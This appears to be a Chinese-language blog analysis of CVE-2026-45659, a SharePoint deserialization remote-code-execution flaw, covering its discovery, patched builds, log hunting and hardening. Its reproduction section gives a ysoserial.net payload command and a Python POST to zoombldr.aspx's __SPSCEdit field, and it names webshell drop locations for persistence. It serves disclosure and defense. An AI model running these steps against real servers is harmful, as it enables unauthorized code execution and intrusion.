SharePoint 反序列化 RCE:CVE-2026-45659 分析

一个普通 Site Member 账户就足以在 SharePoint 服务器上执行任意代码。微软最初判定「利用可能性较低」,CISA 依据在野证据把它拉进了 KEV,并要求三天内完成修复。

概述

项目 详情
CVE 编号 CVE-2026-45659
CVSS 8.8(High)
CWE CWE-502 不可信数据反序列化
影响产品 SharePoint Server 2016 / 2019 / Subscription Edition
修复方式 2026 年 5 月安全更新
披露时间 2026-05-21
利用状态 在野利用(CISA KEV + 勒索软件)

SharePoint Server 是企业内网里部署最广的协作平台之一。这个漏洞允许持有最低限度 Site Member 权限(PR:L)的已认证攻击者在目标服务器上执行任意代码,不需要管理员或其他提升权限。

CISA 在 2026 年 7 月 1 日把它列入已知被利用漏洞(KEV)目录,并要求联邦机构在 7 月 4 日前完成修复——从列入到截止只有三天。这个节奏同时说明了两件事:它在野被积极利用,而且与勒索软件攻击相关。

被怎么发现的

研究人员审计的是 _layouts 目录下特定端点的处理逻辑。_layouts/15/zoombldr.aspx 与 _layouts/15/people.aspx 会接受 POST 请求里的 __SPSCEdit 字段,并对该字段执行反序列化,却没有充分验证被反序列化数据的来源与类型。

这意味着攻击者可以把恶意的序列化负载直接塞进 __SPSCEdit。服务器处理请求时,反序列化会调用攻击者指定的对象类型和构造函数,最终形成任意代码执行。

微软在 2026 年 5 月 21 日发布了安全公告与补丁。但公告里的初始评估把它标为「利用可能性较低」(Exploitation Less Likely);CISA 随后基于实际在野利用的证据将其加入 KEV。两者之间的落差本身就是结论:厂商的初始评估不是最终判断。

复现过程

以下内容仅用于授权安全测试。

实验室需要:Windows Server 2019 或 2022、SharePoint Server 2019(build 低于 16.0.10417.20128)、一个具 Site Member 权限的域用户账户、以及 ysoserial.net。

第一步:生成 .NET 反序列化负载。 用 TypeConfuseDelegate 链配合 BinaryFormatter 格式,输出 Base64:

.\ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter `
  -c "cmd /c whoami" -o base64

第二步:发送利用请求。 把负载放进 __SPSCEdit,连同列表与来源字段一起 POST 到目标端点,使用 Site Member 账户做 NTLM 认证:

data = {
    "__SPSCEdit": payload_b64,
    "__List": "Documents",
    "__Source": f"{target}/Documents/Forms/AllItems.aspx",
}
session.post(f"{target}/_layouts/15/zoombldr.aspx", data=data, auth=(user, pwd))

状态码 200 说明请求被接受,401 是凭据问题,403 则说明权限不足——这个漏洞需要的正是最低档的 Site Member。

第三步:验证与后利用。 命令有回显时直接看响应;没有回显时可用 DNS 外带(例如让目标解析一个带主机名的子域)确认。拿到代码执行后,攻击者的典型动作是往 Web 可访问目录写入 Webshell 维持访问——_layouts、_vti_bin、LAYOUTS/TEMPLATE 是常见落点。

修复方案

安装 2026 年 5 月发布的 SharePoint 安全更新,修复后的内部版本如下:

产品版本 修复后 Build
Subscription Edition 16.0.19725.20280
Server 2019 16.0.10417.20128
Enterprise Server 2016 16.0.5552.1002

排查重点是 SharePoint 审计日志与 IIS 日志:对 _layouts/15/zoombldr.aspx 与 _layouts/15/people.aspx 的异常 POST、__SPSCEdit 字段的异常使用、Web 可访问目录中出现的异常文件(例如 .aspx Webshell),以及异常的子进程创建事件。

深度防御按最小权限原则展开:严格限制 Site Member 的分配;在网络层限制对管理端点与 _layouts 目录的非必要访问;开启详细审计日志,并部署 EDR 监控可疑的代码执行行为。

总结

这个漏洞的严重性来自低权限利用条件。一个普通的 Site Member 账户,在大多数 SharePoint 环境里就是默认分配给普通员工的级别,却足以在服务器上执行任意代码。一次成功的钓鱼拿到一份普通域用户凭据,就足以成为内网渗透的起点。

微软的「利用可能性较低」与 CISA 将其列入 KEV 并给出三天期限之间的差距,是这份报告里最值得带走的一条经验:漏洞的在野利用动态需要持续跟踪,而不是在公告发布当天就下结论。

← 返回文章列表

评论

…